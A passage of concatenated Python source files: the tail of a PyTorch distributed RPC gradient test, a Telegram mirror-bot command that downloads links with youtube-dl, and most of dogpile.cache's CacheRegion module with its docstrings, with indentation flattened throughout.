x = torch.randn(5000, 2000).to(0)
# local iteration
local_model = nn.Sequential(*local_layers)
local_model(x).sum().backward()
# remote iteration
with dist_autograd.context() as context_id:
for remote_layer in remote_layers:
x = remote_layer.rpc_sync().forward(x)
dist_autograd.backward(context_id, [x.sum()])
futs = []
for remote_layer in remote_layers:
futs.append(remote_layer.rpc_async().gradients(context_id))
for i in range(len(futs)):
local_gradients = [p.grad for p in local_layers[i].parameters()]
for g1, g2 in zip(futs[i].wait(), local_gradients):
self.assertEqual(g1, g2)
rpc.shutdown()
|
watch.py
|
from telegram.ext import CommandHandler, run_async
from telegram import Bot, Update
from bot import Interval, DOWNLOAD_DIR, DOWNLOAD_STATUS_UPDATE_INTERVAL, dispatcher, LOGGER
from bot.helper.ext_utils.bot_utils import setInterval
from bot.helper.telegram_helper.message_utils import update_all_messages, sendMessage, sendStatusMessage
from .mirror import MirrorListener
from bot.helper.mirror_utils.download_utils.youtube_dl_download_helper import YoutubeDLHelper
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot.helper.telegram_helper.filters import CustomFilters
import threading
def _watch(bot: Bot, update: Update, args: list, isTar=False):
try:
link = args[0]
except IndexError:
msg = f"/{BotCommands.WatchCommand} [yt_dl supported link] [quality] to mirror with youtube_dl.\n\n"
msg += "Example of quality :- audio, 144, 360, 720, 1080.\nNote :- Quality is optional"
sendMessage(msg, bot, update)
return
try:
qual = args[1]
if qual != "audio":
qual = f'best[height<={qual}]/bestvideo[height<={qual}]+bestaudio'
except IndexError:
qual = "best/bestvideo+bestaudio"
reply_to = update.message.reply_to_message
if reply_to is not None:
tag = reply_to.from_user.username
else:
tag = None
listener = MirrorListener(bot, update, isTar, tag)
ydl = YoutubeDLHelper(listener)
threading.Thread(target=ydl.add_download,args=(link, f'{DOWNLOAD_DIR}{listener.uid}', qual)).start()
sendStatusMessage(update, bot)
if len(Interval) == 0:
Interval.append(setInterval(DOWNLOAD_STATUS_UPDATE_INTERVAL, update_all_messages))
@run_async
def watchTar(update, context):
_watch(context.bot, update, context.args, True)
def watch(update, context):
_watch(context.bot, update, context.args)
mirror_handler = CommandHandler(BotCommands.WatchCommand, watch,
pass_args=True,
filters=CustomFilters.authorized_chat | CustomFilters.authorized_user)
tar_mirror_handler = CommandHandler(BotCommands.TarWatchCommand, watchTar,
pass_args=True,
filters=CustomFilters.authorized_chat | CustomFilters.authorized_user)
dispatcher.add_handler(mirror_handler)
dispatcher.add_handler(tar_mirror_handler)
|
region.py
|
from __future__ import with_statement
import datetime
from functools import partial
from functools import wraps
from numbers import Number
import threading
import time
from decorator import decorate
from . import exception
from .api import CachedValue
from .api import NO_VALUE
from .backends import _backend_loader
from .backends import register_backend # noqa
from .proxy import ProxyBackend
from .util import function_key_generator
from .util import function_multi_key_generator
from .. import Lock
from .. import NeedRegenerationException
from ..util import coerce_string_conf
from ..util import compat
from ..util import memoized_property
from ..util import NameRegistry
from ..util import PluginLoader
value_version = 1
"""An integer placed in the :class:`.CachedValue`
so that new versions of dogpile.cache can detect cached
values from a previous, backwards-incompatible version.
"""
class RegionInvalidationStrategy(object):
"""Region invalidation strategy interface
Implement this interface and pass implementation instance
to :meth:`.CacheRegion.configure` to override default region invalidation.
Example::
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return ((self._soft_invalidated and
timestamp < self._soft_invalidated) or
(self._hard_invalidated and
timestamp < self._hard_invalidated))
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (self._hard_invalidated and
timestamp < self._hard_invalidated)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (self._soft_invalidated and
timestamp < self._soft_invalidated)
The custom implementation is injected into a :class:`.CacheRegion`
at configure time using the
:paramref:`.CacheRegion.configure.region_invalidator` parameter::
region = CacheRegion()
region = region.configure(region_invalidator=CustomInvalidationStrategy()) # noqa
Invalidation strategies that wish to have access to the
:class:`.CacheRegion` itself should construct the invalidator given the
region as an argument::
class MyInvalidator(RegionInvalidationStrategy):
def __init__(self, region):
self.region = region
# ...
# ...
region = CacheRegion()
region = region.configure(region_invalidator=MyInvalidator(region))
.. versionadded:: 0.6.2
.. seealso::
:paramref:`.CacheRegion.configure.region_invalidator`
"""
def invalidate(self, hard=True):
"""Region invalidation.
:class:`.CacheRegion` propagated call.
The default invalidation system works by setting
a current timestamp (using ``time.time()``) to consider all older
timestamps effectively invalidated.
"""
raise NotImplementedError()
def is_hard_invalidated(self, timestamp):
"""Check timestamp to determine if it was hard invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in hard mode.
"""
raise NotImplementedError()
def is_soft_invalidated(self, timestamp):
"""Check timestamp to determine if it was soft invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time and region is invalidated
in soft mode.
"""
raise NotImplementedError()
def is_invalidated(self, timestamp):
"""Check timestamp to determine if it was invalidated.
:return: Boolean. True if ``timestamp`` is older than
the last region invalidation time.
"""
raise NotImplementedError()
def was_soft_invalidated(self):
"""Indicate the region was invalidated in soft mode.
:return: Boolean. True if region was invalidated in soft mode.
"""
raise NotImplementedError()
def was_hard_invalidated(self):
"""Indicate the region was invalidated in hard mode.
:return: Boolean. True if region was invalidated in hard mode.
"""
raise NotImplementedError()
class DefaultInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._is_hard_invalidated = None
self._invalidated = None
def invalidate(self, hard=True):
self._is_hard_invalidated = bool(hard)
self._invalidated = time.time()
def is_invalidated(self, timestamp):
return self._invalidated is not None and timestamp < self._invalidated
def was_hard_invalidated(self):
return self._is_hard_invalidated is True
def is_hard_invalidated(self, timestamp):
return self.was_hard_invalidated() and self.is_invalidated(timestamp)
def was_soft_invalidated(self):
return self._is_hard_invalidated is False
def is_soft_invalidated(self, timestamp):
return self.was_soft_invalidated() and self.is_invalidated(timestamp)
class CacheRegion(object):
r"""A front end to a particular cache backend.
:param name: Optional, a string name for the region.
This isn't used internally
but can be accessed via the ``.name`` parameter, helpful
for configuring a region from a config file.
:param function_key_generator: Optional. A
function that will produce a "cache key" given
a data creation function and arguments, when using
the :meth:`.CacheRegion.cache_on_arguments` method.
The structure of this function
should be two levels: given the data creation function,
return a new function that generates the key based on
the given arguments. Such as::
def my_key_generator(namespace, fn, **kw):
fname = fn.__name__
def generate_key(*arg):
return namespace + "_" + fname + "_".join(str(s) for s in arg)
return generate_key
region = make_region(
function_key_generator = my_key_generator
).configure(
"dogpile.cache.dbm",
expiration_time=300,
arguments={
"filename":"file.dbm"
}
)
The ``namespace`` is that passed to
:meth:`.CacheRegion.cache_on_arguments`. It's not consulted
outside this function, so in fact can be of any form.
For example, it can be passed as a tuple, used to specify
arguments to pluck from \**kw::
def my_key_generator(namespace, fn):
def generate_key(*arg, **kw):
return ":".join(
[kw[k] for k in namespace] +
[str(x) for x in arg]
)
return generate_key
Where the decorator might be used as::
@my_region.cache_on_arguments(namespace=('x', 'y'))
def my_function(a, b, **kw):
return my_data()
.. seealso::
:func:`.function_key_generator` - default key generator
:func:`.kwarg_function_key_generator` - optional gen that also
uses keyword arguments
:param function_multi_key_generator: Optional.
Similar to ``function_key_generator`` parameter, but it's used in
:meth:`.CacheRegion.cache_multi_on_arguments`. Generated function
should return list of keys. For example::
def my_multi_key_generator(namespace, fn, **kw):
namespace = fn.__name__ + (namespace or '')
def generate_keys(*args):
return [namespace + ':' + str(a) for a in args]
return generate_keys
:param key_mangler: Function which will be used on all incoming
keys before passing to the backend. Defaults to ``None``,
in which case the key mangling function recommended by
the cache backend will be used. A typical mangler
is the SHA1 mangler found at :func:`.sha1_mangle_key`
which coerces keys into a SHA1
hash, so that the string length is fixed. To
disable all key mangling, set to ``False``. Another typical
mangler is the built-in Python function ``str``, which can be used
to convert non-string or Unicode keys to bytestrings, which is
needed when using a backend such as bsddb or dbm under Python 2.x
in conjunction with Unicode keys.
:param async_creation_runner: A callable that, when specified,
will be passed to and called by dogpile.lock when
there is a stale value present in the cache. It will be passed the
mutex and is responsible releasing that mutex when finished.
This can be used to defer the computation of expensive creator
functions to later points in the future by way of, for example, a
background thread, a long-running queue, or a task manager system
like Celery.
For a specific example using async_creation_runner, new values can
be created in a background thread like so::
import threading
def async_creation_runner(cache, somekey, creator, mutex):
''' Used by dogpile.core:Lock when appropriate '''
def runner():
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
thread = threading.Thread(target=runner)
thread.start()
region = make_region(
async_creation_runner=async_creation_runner,
).configure(
'dogpile.cache.memcached',
expiration_time=5,
arguments={
'url': '127.0.0.1:11211',
'distributed_lock': True,
}
)
Remember that the first request for a key with no associated
value will always block; async_creator will not be invoked.
However, subsequent requests for cached-but-expired values will
still return promptly. They will be refreshed by whatever
asynchronous means the provided async_creation_runner callable
implements.
By default the async_creation_runner is disabled and is set
to ``None``.
.. versionadded:: 0.4.2 added the async_creation_runner
feature.
"""
def __init__(
self,
name=None,
function_key_generator=function_key_generator,
function_multi_key_generator=function_multi_key_generator,
key_mangler=None,
async_creation_runner=None,
):
"""Construct a new :class:`.CacheRegion`."""
self.name = name
self.function_key_generator = function_key_generator
self.function_multi_key_generator = function_multi_key_generator
self.key_mangler = self._user_defined_key_mangler = key_mangler
self.async_creation_runner = async_creation_runner
self.region_invalidator = DefaultInvalidationStrategy()
def configure(
self,
backend,
expiration_time=None,
arguments=None,
_config_argument_dict=None,
_config_prefix=None,
wrap=None,
replace_existing_backend=False,
region_invalidator=None,
):
"""Configure a :class:`.CacheRegion`.
The :class:`.CacheRegion` itself
is returned.
:param backend: Required. This is the name of the
:class:`.CacheBackend` to use, and is resolved by loading
the class from the ``dogpile.cache`` entrypoint.
:param expiration_time: Optional. The expiration time passed
to the dogpile system. May be passed as an integer number
of seconds, or as a ``datetime.timedelta`` value.
.. versionadded 0.5.0
``expiration_time`` may be optionally passed as a
``datetime.timedelta`` value.
The :meth:`.CacheRegion.get_or_create`
method as well as the :meth:`.CacheRegion.cache_on_arguments`
decorator (though note: **not** the :meth:`.CacheRegion.get`
method) will call upon the value creation function after this
time period has passed since the last generation.
:param arguments: Optional. The structure here is passed
directly to the constructor of the :class:`.CacheBackend`
in use, though is typically a dictionary.
:param wrap: Optional. A list of :class:`.ProxyBackend`
classes and/or instances, each of which will be applied
in a chain to ultimately wrap the original backend,
so that custom functionality augmentation can be applied.
.. versionadded:: 0.5.0
.. seealso::
:ref:`changing_backend_behavior`
:param replace_existing_backend: if True, the existing cache backend
will be replaced. Without this flag, an exception is raised if
a backend is already configured.
.. versionadded:: 0.5.7
:param region_invalidator: Optional. Override default invalidation
strategy with custom implementation of
:class:`.RegionInvalidationStrategy`.
.. versionadded:: 0.6.2
"""
if "backend" in self.__dict__ and not replace_existing_backend:
raise exception.RegionAlreadyConfigured(
"This region is already "
"configured with backend: %s. "
"Specify replace_existing_backend=True to replace."
% self.backend
)
try:
backend_cls = _backend_loader.load(backend)
except PluginLoader.NotFound:
raise exception.PluginNotFound(
"Couldn't find cache plugin to load: %s" % backend
)
if _config_argument_dict:
self.backend = backend_cls.from_config_dict(
_config_argument_dict, _config_prefix
)
else:
self.backend = backend_cls(arguments or {})
if not expiration_time or isinstance(expiration_time, Number):
self.expiration_time = expiration_time
elif isinstance(expiration_time, datetime.timedelta):
self.expiration_time = int(
compat.timedelta_total_seconds(expiration_time)
)
else:
raise exception.ValidationError(
"expiration_time is not a number or timedelta."
)
if not self._user_defined_key_mangler:
self.key_mangler = self.backend.key_mangler
self._lock_registry = NameRegistry(self._create_mutex)
if getattr(wrap, "__iter__", False):
for wrapper in reversed(wrap):
self.wrap(wrapper)
if region_invalidator:
self.region_invalidator = region_invalidator
return self
def wrap(self, proxy):
""" Takes a ProxyBackend instance or class and wraps the
attached backend. """
# if we were passed a type rather than an instance then
# initialize it.
if type(proxy) == type:
proxy = proxy()
if not issubclass(type(proxy), ProxyBackend):
raise TypeError(
"Type %s is not a valid ProxyBackend" % type(proxy)
)
self.backend = proxy.wrap(self.backend)
def _mutex(self, key):
return self._lock_registry.get(key)
class _LockWrapper(object):
"""weakref-capable wrapper for threading.Lock"""
def __init__(self):
self.lock = threading.Lock()
def acquire(self, wait=True):
return self.lock.acquire(wait)
def release(self):
self.lock.release()
def _create_mutex(self, key):
mutex = self.backend.get_mutex(key)
if mutex is not None:
return mutex
else:
return self._LockWrapper()
# cached value
_actual_backend = None
@property
def actual_backend(self):
"""Return the ultimate backend underneath any proxies.
The backend might be the result of one or more ``proxy.wrap``
applications. If so, derive the actual underlying backend.
.. versionadded:: 0.6.6
"""
if self._actual_backend is None:
_backend = self.backend
while hasattr(_backend, "proxied"):
_backend = _backend.proxied
self._actual_backend = _backend
return self._actual_backend
def invalidate(self, hard=True):
"""Invalidate this :class:`.CacheRegion`.
The default invalidation system works by setting
a current timestamp (using ``time.time()``)
representing the "minimum creation time" for
a value. Any retrieved value whose creation
time is prior to this timestamp
is considered to be stale. It does not
affect the data in the cache in any way, and is
**local to this instance of :class:`.CacheRegion`.**
.. warning::
The :meth:`.CacheRegion.invalidate` method's default mode of
operation is to set a timestamp **local to this CacheRegion
in this Python process only**. It does not impact other Python
processes or regions as the timestamp is **only stored locally in
memory**. To implement invalidation where the
timestamp is stored in the cache or similar so that all Python
processes can be affected by an invalidation timestamp, implement a
custom :class:`.RegionInvalidationStrategy`.
Once set, the invalidation time is honored by
the :meth:`.CacheRegion.get_or_create`,
:meth:`.CacheRegion.get_or_create_multi` and
:meth:`.CacheRegion.get` methods.
The method supports both "hard" and "soft" invalidation
options. With "hard" invalidation,
:meth:`.CacheRegion.get_or_create` will force an immediate
regeneration of the value which all getters will wait for.
With "soft" invalidation, subsequent getters will return the
"old" value until the new one is available.
Usage of "soft" invalidation requires that the region or the method
is given a non-None expiration time.
.. versionadded:: 0.3.0
:param hard: if True, cache values will all require immediate
regeneration; dogpile logic won't be used. If False, the
creation time of existing values will be pushed back before
the expiration time so that a return+regen will be invoked.
.. versionadded:: 0.5.1
"""
self.region_invalidator.invalidate(hard)
def configure_from_config(self, config_dict, prefix):
"""Configure from a configuration dictionary
and a prefix.
Example::
local_region = make_region()
memcached_region = make_region()
# regions are ready to use for function
# decorators, but not yet for actual caching
# later, when config is available
myconfig = {
"cache.local.backend":"dogpile.cache.dbm",
"cache.local.arguments.filename":"/path/to/dbmfile.dbm",
"cache.memcached.backend":"dogpile.cache.pylibmc",
"cache.memcached.arguments.url":"127.0.0.1, 10.0.0.1",
}
local_region.configure_from_config(myconfig, "cache.local.")
memcached_region.configure_from_config(myconfig,
"cache.memcached.")
"""
config_dict = coerce_string_conf(config_dict)
return self.configure(
config_dict["%sbackend" % prefix],
expiration_time=config_dict.get(
"%sexpiration_time" % prefix, None
),
_config_argument_dict=config_dict,
_config_prefix="%sarguments." % prefix,
wrap=config_dict.get("%swrap" % prefix, None),
replace_existing_backend=config_dict.get(
"%sreplace_existing_backend" % prefix, False
),
)
@memoized_property
def backend(self):
raise exception.RegionNotConfigured(
"No backend is configured on this region."
)
@property
def is_configured(self):
"""Return True if the backend has been configured via the
:meth:`.CacheRegion.configure` method already.
.. versionadded:: 0.5.1
"""
return "backend" in self.__dict__
def get(self, key, expiration_time=None, ignore_expiration=False):
"""Return a value from the cache, based on the given key.
If the value is not present, the method returns the token
``NO_VALUE``. ``NO_VALUE`` evaluates to False, but is separate from
``None`` to distinguish between a cached value of ``None``.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionchanged:: 0.3.0
:meth:`.CacheRegion.get` now checks the value's creation time
against the expiration time, rather than returning
the value unconditionally.
The method also interprets the cached value in terms
of the current "invalidation" time as set by
the :meth:`.invalidate` method. If a value is present,
but its creation time is older than the current
invalidation time, the ``NO_VALUE`` token is returned.
Passing the flag ``ignore_expiration=True`` bypasses
the invalidation time check.
.. versionadded:: 0.3.0
Support for the :meth:`.CacheRegion.invalidate`
method.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param expiration_time: Optional expiration time value
which will supersede that configured on the :class:`.CacheRegion`
itself.
.. note:: The :paramref:`.CacheRegion.get.expiration_time`
argument is **not persisted in the cache** and is relevant
only to **this specific cache retrieval operation**, relative to
the creation time stored with the existing cached value.
Subsequent calls to :meth:`.CacheRegion.get` are **not** affected
by this value.
.. versionadded:: 0.3.0
:param ignore_expiration: if ``True``, the value is returned
from the cache if present, regardless of configured
expiration times or whether or not :meth:`.invalidate`
was called.
.. versionadded:: 0.3.0
.. seealso::
:meth:`.CacheRegion.get_multi`
:meth:`.CacheRegion.get_or_create`
:meth:`.CacheRegion.set`
:meth:`.CacheRegion.delete`
"""
if self.key_mangler:
key = self.key_mangler(key)
value = self.backend.get(key)
value = self._unexpired_value_fn(expiration_time, ignore_expiration)(
value
)
return value.payload
def _unexpired_value_fn(self, expiration_time, ignore_expiration):
if ignore_expiration:
return lambda value: value
else:
if expiration_time is None:
expiration_time = self.expiration_time
current_time = time.time()
def value_fn(value):
if value is NO_VALUE:
return value
elif (
expiration_time is not None
and current_time - value.metadata["ct"] > expiration_time
):
return NO_VALUE
elif self.region_invalidator.is_invalidated(
value.metadata["ct"]
):
return NO_VALUE
else:
return value
return value_fn
def get_multi(self, keys, expiration_time=None, ignore_expiration=False):
"""Return multiple values from the cache, based on the given keys.
Returns values as a list matching the keys given.
E.g.::
values = region.get_multi(["one", "two", "three"])
To convert values to a dictionary, use ``zip()``::
keys = ["one", "two", "three"]
values = region.get_multi(keys)
dictionary = dict(zip(keys, values))
Keys which aren't present in the list are returned as
the ``NO_VALUE`` token. ``NO_VALUE`` evaluates to False,
but is separate from
``None`` to distinguish between a cached value of ``None``.
By default, the configured expiration time of the
:class:`.CacheRegion`, or alternatively the expiration
time supplied by the ``expiration_time`` argument,
is tested against the creation time of the retrieved
value versus the current time (as reported by ``time.time()``).
If stale, the cached value is ignored and the ``NO_VALUE``
token is returned. Passing the flag ``ignore_expiration=True``
bypasses the expiration time check.
.. versionadded:: 0.5.0
"""
if not keys:
return []
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
backend_values = self.backend.get_multi(keys)
_unexpired_value_fn = self._unexpired_value_fn(
expiration_time, ignore_expiration
)
return [
value.payload if value is not NO_VALUE else value
for value in (
_unexpired_value_fn(value) for value in backend_values
)
]
def get_or_create(
self,
key,
creator,
expiration_time=None,
should_cache_fn=None,
creator_args=None,
):
"""Return a cached value based on the given key.
If the value does not exist or is considered to be expired
based on its creation time, the given
creation function may or may not be used to recreate the value
and persist the newly generated value in the cache.
Whether or not the function is used depends on if the
*dogpile lock* can be acquired or not. If it can't, it means
a different thread or process is already running a creation
function for this key against the cache. When the dogpile
lock cannot be acquired, the method will block if no
previous value is available, until the lock is released and
a new value available. If a previous value
is available, that value is returned immediately without blocking.
If the :meth:`.invalidate` method has been called, and
the retrieved value's timestamp is older than the invalidation
timestamp, the value is unconditionally prevented from
being returned. The method will attempt to acquire the dogpile
lock to generate a new value, or will wait
until the lock is released to return the new value.
.. versionchanged:: 0.3.0
The value is unconditionally regenerated if the creation
time is older than the last call to :meth:`.invalidate`.
:param key: Key to be retrieved. While it's typical for a key to be a
string, it is ultimately passed directly down to the cache backend,
before being optionally processed by the key_mangler function, so can
be of any type recognized by the backend or by the key_mangler
function, if present.
:param creator: function which creates a new value.
:param creator_args: optional tuple of (args, kwargs) that will be
passed to the creator function if present.
.. versionadded:: 0.7.0
:param expiration_time: optional expiration time which will overide
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
.. note:: The :paramref:`.CacheRegion.get_or_create.expiration_time`
argument is **not persisted in the cache** and is relevant
only to **this specific cache retrieval operation**, relative to
the creation time stored with the existing cached value.
Subsequent calls to :meth:`.CacheRegion.get_or_create` are **not**
affected by this value.
:param should_cache_fn: optional callable function which will receive
the value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
E.g.::
def dont_cache_none(value):
return value is not None
value = region.get_or_create("some key",
create_value,
should_cache_fn=dont_cache_none)
Above, the function returns the value of create_value() if
the cache is invalid, however if the return value is None,
it won't be cached.
.. versionadded:: 0.4.3
.. seealso::
:meth:`.CacheRegion.get`
:meth:`.CacheRegion.cache_on_arguments` - applies
:meth:`.get_or_create` to any function using a decorator.
:meth:`.CacheRegion.get_or_create_multi` - multiple key/value
version
"""
orig_key = key
if self.key_mangler:
key = self.key_mangler(key)
def get_value():
value = self.backend.get(key)
if (
value is NO_VALUE
or value.metadata["v"] != value_version
or self.region_invalidator.is_hard_invalidated(
value.metadata["ct"]
)
):
raise NeedRegenerationException()
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - 0.0001
return value.payload, ct
def gen_value():
if creator_args:
created_value = creator(*creator_args[0], **creator_args[1])
else:
created_value = creator()
value = self._value(created_value)
if not should_cache_fn or should_cache_fn(created_value):
self.backend.set(key, value)
return value.payload, value.metadata["ct"]
if expiration_time is None:
expiration_time = self.expiration_time
if (
expiration_time is None
and self.region_invalidator.was_soft_invalidated()
):
raise exception.DogpileCacheException(
"Non-None expiration time required " "for soft invalidation"
)
if expiration_time == -1:
expiration_time = None
if self.async_creation_runner:
def async_creator(mutex):
if creator_args:
@wraps(creator)
def go():
return creator(*creator_args[0], **creator_args[1])
else:
go = creator
return self.async_creation_runner(self, orig_key, go, mutex)
else:
async_creator = None
with Lock(
self._mutex(key),
gen_value,
get_value,
expiration_time,
async_creator,
) as value:
return value
def get_or_create_multi(
self, keys, creator, expiration_time=None, should_cache_fn=None
):
"""Return a sequence of cached values based on a sequence of keys.
The behavior for generation of values based on keys corresponds
to that of :meth:`.Region.get_or_create`, with the exception that
the ``creator()`` function may be asked to generate any subset of
the given keys. The list of keys to be generated is passed to
``creator()``, and ``creator()`` should return the generated values
as a sequence corresponding to the order of the keys.
The method uses the same approach as :meth:`.Region.get_multi`
and :meth:`.Region.set_multi` to get and set values from the
backend.
If you are using a :class:`.CacheBackend` or :class:`.ProxyBackend`
that modifies values, take note this function invokes
``.set_multi()`` for newly generated values using the same values it
returns to the calling function. A correct implementation of
``.set_multi()`` will not modify values in-place on the submitted
``mapping`` dict.
:param keys: Sequence of keys to be retrieved.
:param creator: function which accepts a sequence of keys and
returns a sequence of new values.
:param expiration_time: optional expiration time which will overide
the expiration time already configured on this :class:`.CacheRegion`
if not None. To set no expiration, use the value -1.
:param should_cache_fn: optional callable function which will receive
each value returned by the "creator", and will then return True or
False, indicating if the value should actually be cached or not. If
it returns False, the value is still returned, but isn't cached.
.. versionadded:: 0.5.0
.. seealso::
:meth:`.CacheRegion.cache_multi_on_arguments`
:meth:`.CacheRegion.get_or_create`
"""
def get_value(key):
value = values.get(key, NO_VALUE)
if (
value is NO_VALUE
or value.metadata["v"] != value_version
or self.region_invalidator.is_hard_invalidated(
value.metadata["ct"]
)
):
# dogpile.core understands a 0 here as
# "the value is not available", e.g.
# _has_value() will return False.
return value.payload, 0
else:
ct = value.metadata["ct"]
if self.region_invalidator.is_soft_invalidated(ct):
ct = time.time() - expiration_time - 0.0001
return value.payload, ct
def gen_value():
raise NotImplementedError()
def async_creator(key, mutex):
mutexes[key] = mutex
if expiration_time is None:
expiration_time = self.expiration_time
if (
expiration_time is None
and self.region_invalidator.was_soft_invalidated()
):
raise exception.DogpileCacheException(
"Non-None expiration time required " "for soft invalidation"
)
if expiration_time == -1:
expiration_time = None
mutexes = {}
sorted_unique_keys = sorted(set(keys))
if self.key_mangler:
mangled_keys = [self.key_mangler(k) for k in sorted_unique_keys]
else:
mangled_keys = sorted_unique_keys
orig_to_mangled = dict(zip(sorted_unique_keys, mangled_keys))
values = dict(zip(mangled_keys, self.backend.get_multi(mangled_keys)))
for orig_key, mangled_key in orig_to_mangled.items():
with Lock(
self._mutex(mangled_key),
gen_value,
lambda: get_value(mangled_key),
expiration_time,
async_creator=lambda mutex: async_creator(orig_key, mutex),
):
pass
try:
if mutexes:
# sort the keys, the idea is to prevent deadlocks.
# though haven't been able to simulate one anyway.
keys_to_get = sorted(mutexes)
new_values = creator(*keys_to_get)
values_w_created = dict(
(orig_to_mangled[k], self._value(v))
for k, v in zip(keys_to_get, new_values)
)
if not should_cache_fn:
self.backend.set_multi(values_w_created)
else:
values_to_cache = dict(
(k, v)
for k, v in values_w_created.items()
if should_cache_fn(v[0])
)
if values_to_cache:
self.backend.set_multi(values_to_cache)
values.update(values_w_created)
return [values[orig_to_mangled[k]].payload for k in keys]
finally:
for mutex in mutexes.values():
mutex.release()
def _value(self, value):
"""Return a :class:`.CachedValue` given a value."""
return CachedValue(value, {"ct": time.time(), "v": value_version})
def set(self, key, value):
"""Place a new value in the cache under the given key."""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.set(key, self._value(value))
def set_multi(self, mapping):
"""Place new values in the cache under the given keys.
.. versionadded:: 0.5.0
"""
if not mapping:
return
if self.key_mangler:
mapping = dict(
(self.key_mangler(k), self._value(v))
for k, v in mapping.items()
)
else:
mapping = dict((k, self._value(v)) for k, v in mapping.items())
self.backend.set_multi(mapping)
def delete(self, key):
"""Remove a value from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
"""
if self.key_mangler:
key = self.key_mangler(key)
self.backend.delete(key)
def delete_multi(self, keys):
"""Remove multiple values from the cache.
This operation is idempotent (can be called multiple times, or on a
non-existent key, safely)
.. versionadded:: 0.5.0
"""
if self.key_mangler:
keys = list(map(lambda key: self.key_mangler(key), keys))
self.backend.delete_multi(keys)
def cache_on_arguments(
self,
namespace=None,
expiration_time=None,
should_cache_fn=None,
to_str=compat.string_type,
function_key_generator=None,
):
"""A function decorator that will cache the return
value of the function using a key derived from the
function itself and its arguments.
The decorator internally makes use of the
:meth:`.CacheRegion.get_or_create` method to access the
cache and conditionally call the function. See that
method for additional behavioral details.
E.g.::
@someregion.cache_on_arguments()
def generate_something(x, y):
return somedatabase.query(x, y)
The decorated function can then be called normally, where
data will be pulled from the cache region unless a new
value is needed::
result = generate_something(5, 6)
The function is also given an attribute ``invalidate()``, which
provides for invalidation of the value. Pass to ``invalidate()``
the same arguments you'd pass to the function itself to represent
a particular value::
generate_something.invalidate(5, 6)
Another attribute ``set()`` is added to provide extra caching
possibilities relative to the function. This is a convenience
method for :meth:`.CacheRegion.set` which will store a given
value directly without calling the decorated function.
The value to be cached is passed as the first argument, and the
arguments which would normally be passed to the function
should follow::
generate_something.set(3, 5, 6)
The above example is equivalent to calling
``generate_something(5, 6)``, if the function were to produce
the value ``3`` as the value to be cached.
.. versionadded:: 0.4.1 Added ``set()`` method to decorated function.
Similar to ``set()`` is ``refresh()``. This attribute will
invoke the decorated function and populate a new value into
the cache with the new value, as well as returning that value::
newvalue = generate_something.refresh(5, 6)
.. versionadded:: 0.5.0 Added ``refresh()`` method to decorated
function.
``original()`` on other hand will invoke the decorated function
without any caching::
newvalue = generate_something.original(5, 6)
.. versionadded:: 0.6.0 Added ``original()`` method to decorated
function.
Lastly, the ``get()`` method returns either the value cached
for the given key, or the token ``NO_VALUE`` if no such key
exists::
value = generate_something.get(5, 6)
.. versionadded:: 0.5.3 Added ``get()`` method to decorated
function.
The default key generation will use the name
of the function, the module name for the function,
the arguments passed, as well as an optional "namespace"
parameter in order to generate a cache key.
Given a function ``one`` inside the module
``myapp.tools``::
@region.cache_on_arguments(namespace="foo")
def one(a, b):
return a + b
Above, calling ``one(3, 4)`` will produce a
cache key as follows::
myapp.tools:one|foo|3 4
The key generator will ignore an initial argument
of ``self`` or ``cls``, making the decorator suitable
(with caveats) for use with instance or class methods.
Given the example::
class MyClass(object):
@region.cache_on_arguments(namespace="foo")
def one(self, a, b):
return a + b
The cache key above for ``MyClass().one(3, 4)`` will
again produce the same cache key of ``myapp.tools:one|foo|3 4`` -
the name ``self`` is skipped.
The ``namespace`` parameter is optional, and is used
normally to disambiguate two functions of the same
name within the same module, as can occur when decorating
instance or class methods as below::
class MyClass(object):
@region.cache_on_arguments(namespace='MC')
def somemethod(self, x, y):
""
class MyOtherClass(object):
@region.cache_on_arguments(namespace='MOC')
def somemethod(self, x, y):
""
Above, the ``namespace`` parameter disambiguates
between ``somemethod`` on ``MyClass`` and ``MyOtherClass``.
Python class declaration mechanics otherwise prevent
the decorator from having awareness of the ``MyClass``
and ``MyOtherClass`` names, as the function is received
by the decorator before it becomes an instance method.
The function key generation can be entirely replaced
on a per-region basis using the ``function_key_generator``
argument present on :func:`.make_region` and
:class:`.CacheRegion`. If defaults to
:func:`.function_key_generator`.
:param namespace: optional string argument which will be
established as part of the cache key. This may be needed
to disambiguate functions of the same name within the same
source file, such as those
associated with classes - note that the decorator itself
can't see the parent class on a function as the class is
being declared.
:param expiration_time: if not None, will override the normal
expiration time.
May be specified as a callable, taking no arguments, that
returns a value to be used as the ``expiration_time``. This callable
will be called whenever the decorated function itself is called, in
caching or retrieving. Thus, this can be used to
determine a *dynamic* expiration time for the cached function
result. Example use cases include "cache the result until the
end of the day, week or time period" and "cache until a certain date
or time passes".
.. versionchanged:: 0.5.0
``expiration_time`` may be passed as a callable to
